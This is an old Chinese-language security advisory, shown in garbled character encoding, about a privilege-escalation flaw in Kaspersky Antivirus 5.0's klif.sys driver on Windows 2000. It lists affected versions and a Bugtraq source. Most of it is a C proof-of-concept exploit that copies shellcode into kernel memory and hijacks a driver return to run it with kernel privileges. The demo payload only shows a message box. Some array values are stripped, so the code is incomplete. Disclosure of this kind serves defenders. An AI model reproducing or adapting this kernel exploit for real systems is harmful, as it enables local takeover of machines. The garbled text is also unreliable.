Kasperskyɱ¶¾Èí¼þ³ÌÐò
 
ÃèÊö£º
Kasperskyɱ¶¾Èí¼þklif.sysȨÏÞÌáÉý©¶´
 
 
Ïêϸ£º
KasperskyÊÇÒ»¿î·Ç³£Á÷ÐеÄɱ¶¾Èí¼þ¡£

Microsoft Windows 2000ƽ̨µÄKasperskyÈí¼þÉè¼ÆÉÏ´æÔÚ©¶´£¬±¾µØ¹¥»÷Õß¿ÉÄÜÀûÓôË©¶´ÌáÉý×Ô¼ºµÄȨÏÞ¡£

ÆðÒòÊÇKasperskyÄÚºËÇý¶¯klif.sysûÓÐÕýÈ·¶ªÆú¸ßȨÏÞ£¬¹¥»÷Õß¿ÉÄÜÀûÓÃÕâ¸ö©¶´ÒÔϵͳÄں˵ÄȨÏÞÖ´ÐÐÈÎÒâ´úÂë¡£

<*À´Ô´£ºIlya Rabinovich £¨info@softsphere.com£©

Á´½Ó£ºhttp://marc.theaimsgroup.com/?l=bugtraq&m=111817777430401&w=2
*>

ÊÜÓ°Ïìϵͳ£º
Kaspersky Labs Kaspersky Antivirus 5.0.335
Kaspersky Labs Kaspersky Antivirus 5.0.228
Kaspersky Labs Kaspersky Antivirus 5.0.227
 
 
¹¥»÷·½·¨£º
ÒÔϳÌÐò(·½·¨)¿ÉÄÜ´øÓй¥»÷ÐÔ£¬½ö¹©°²È«Ñо¿Óë½Ìѧ֮Óá£Ê¹ÓÃÕß·çÏÕ×Ô¸º£¡

//(C) by Ilya Rabinovich.

#include <windows.h>

PUCHAR pCodeBase=(PUCHAR)0xBE9372C0;

PDWORD pJmpAddress=(PDWORD)0xBE9372B0;

PUCHAR pKAVRets[]=;

PUCHAR pKAVRet;


unsigned char code[]={0x68,0x00,0x02,0x00,0x00,£  //push 0x200
 £ £ £ £ £ £ 0x68,0x00,0x80,0x93,0xBE,£  //push <buffer address> - 0xBE938000
 £ £ £ £ £ £ 0x6A,0x00,£ £ £ £ £ £  //push 0
 £ £ £ £ £ £ 0xB8,0x00,0x00,0x00,0x00,£  //mov eax,<GetModuleFileNameA> -> +13
 £ £ £ £ £ £ 0xFF,0xD0,£ £ £ £ £ £  //call eax
 £ £ £ £ £ £ 0x68,0x00,0x80,0x93,0xBE,£  //push <buffer address>
 £ £ £ £ £ £ 0x68,0x00,0x82,0x93,0xBE,£  //push <address of the notepad path>- 0xBE938200
 £ £ £ £ £ £ 0xB8,0x00,0x00,0x00,0x00,£  //mov eax,<lstrcmpiA> -> +30
 £ £ £ £ £ £ 0xFF,0xD0,£ £ £ £ £ £  //call eax
 £ £ £ £ £ £ 0x85,0xC0,£ £ £ £ £ £  //test eax,eax
 £ £ £ £ £ £ 0x74,0x03,£ £ £ £ £ £  //je +03
 £ £ £ £ £ £ 0xC2,0x04,0x00,£ £ £ £ £  //retn 4
 £ £ £ £ £ £ 0x6A,0x00,£ £ £ £ £ £  //push 0
 £ £ £ £ £ £ 0x68,0x00,0x84,0x93,0xBE,£  //push <address of the message string>- 0xBE938400
 £ £ £ £ £ £ 0x68,0x00,0x84,0x93,0xBE,£  //push <address of the message string>- 0xBE938400
 £ £ £ £ £ £ 0x6A,0x00,£ £ £ £ £ £  //push 0
 £ £ £ £ £ £ 0xB8,0x00,0x00,0x00,0x00,£  //mov eax,<MessageBoxA> -> +58
 £ £ £ £ £ £ 0xFF,0xD0,£ £ £ £ £ £  //call eax
 £ £ £ £ £ £ 0xC2,0x04,0x00£ £ £ £ £  //retn 4
 £ £ £ £ £ £ };

unsigned char jmp_code[]=; //jmp dword prt \
[0xBE9372B0]

//////////////////////////////////////////////////////////////

BOOLEAN LoadExploitIntoKernelMemory(void){



//Get function's addresses

 £ HANDLE hKernel=GetModuleHandle("KERNEL32.DLL");
 £ HANDLE hUser=GetModuleHandle("USER32.DLL");

 £ FARPROC pGetModuleFileNameA=GetProcAddress(hKernel,"GetModuleFileNameA");
 £ FARPROC plstrcmpiA=GetProcAddress(hKernel,"lstrcmpiA");

 £ FARPROC pMessageBoxA=GetProcAddress(hUser,"MessageBoxA");

 £ *(DWORD*)(code+13)=(DWORD)pGetModuleFileNameA;
 £ *(DWORD*)(code+30)=(DWORD)plstrcmpiA;
 £ *(DWORD*)(code+58)=(DWORD)pMessageBoxA;

//Prepare our data into ring0-zone.

 £ PCHAR pNotepadName=(PCHAR)0xBE938200;

 £ char temp_buffer[MAX_PATH];
 £ char *s;

 £ SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);

 £ lstrcpy(pNotepadName,temp_buffer);

 £ PCHAR pMessage=(PCHAR)0xBE938400;

 £ lstrcpy(pMessage,"Notepad is running!!! KAV is vulnerable!!!");

 £ memmove(pCodeBase,code,sizeof(code));

 £ *pJmpAddress=(DWORD)pCodeBase;

 £ memmove(pKAVRet,jmp_code,sizeof(jmp_code));

 £ return TRUE;
}

///////////////////////////////////////////////////////////////

void UnloadExploitFromKernelMemory(){

 £ UCHAR retn_4[]=;

 £ memmove(pKAVRet,retn_4,sizeof(retn_4));

}

/////////////////////////////////////////////////////////////////

PUCHAR GetKAVRetAddress(void){

//Check the retn 4 in the KAV 0xBE9334E1 function end
//Also, we check the KAV klif.sys existance.

 £ UCHAR retn_4[]=;

 £ __try{

 £ £ for(DWORD i=0;i<sizeof(pKAVRets)/sizeof(pKAVRets[0]);i++){

 £ £ £  if(memcmp(pKAVRets[i],retn_4,sizeof(retn_4))==0)
 £ £ £ £ £ return pKAVRets[i];

 £ £ }

 £ }__except(EXCEPTION_EXECUTE_HANDLER){MessageBox(NULL,"KAV is not \
installed",NULL,0);return NULL;}


 £ MessageBox(NULL,"Wrong KAV version. You need 5.0.227, 5.0.228 or 5.0.335 versions of \
KAV",NULL,0); return NULL;
}

/////////////////////////////////////////////////////////////////

void main(void){

 £ pKAVRet=GetKAVRetAddress();

 £ if(NULL==pKAVRet)
 £ £ return;


 £ if(!LoadExploitIntoKernelMemory())
 £ £ return;

 £ char temp_buffer[MAX_PATH];
 £ char *s;

 £ SearchPath(NULL,"NOTEPAD",".EXE",sizeof(temp_buffer),temp_buffer,&s);

 £ PROCESS_INFORMATION pi;

 £ STARTUPINFO si=;
 £ si.cb=sizeof(si);

 £ CreateProcess(NULL,temp_buffer,NULL,NULL,FALSE,
 £ £ £ £ £ £ £  0,NULL,NULL,&si,&pi);

 £ WaitForSingleObject(pi.hProcess,INFINITE);

 £ MessageBox(NULL,"Now you may start your own Notepad instance to check this \
exploit!","KAV_EXPLOITER",0);

 £ MessageBox(NULL,"Close this window to stop exploitation","KAV_EXPLOITER",0);

 £ UnloadExploitFromKernelMemory();
}
 
 
½â¾ö·½°¸£º
³§É̲¹¶¡£º

Kaspersky Labs
--------------
Ä¿Ç°³§ÉÌ»¹Ã»ÓÐÌṩ²¹¶¡»òÕßÉý¼¶³ÌÐò£¬ÎÒÃǽ¨ÒéʹÓôËÈí¼þµÄÓû§Ëæʱ¹Ø×¢³§É̵ÄÖ÷Ò³ÒÔ»ñÈ¡×îа汾£º

http://www.kaspersky.com/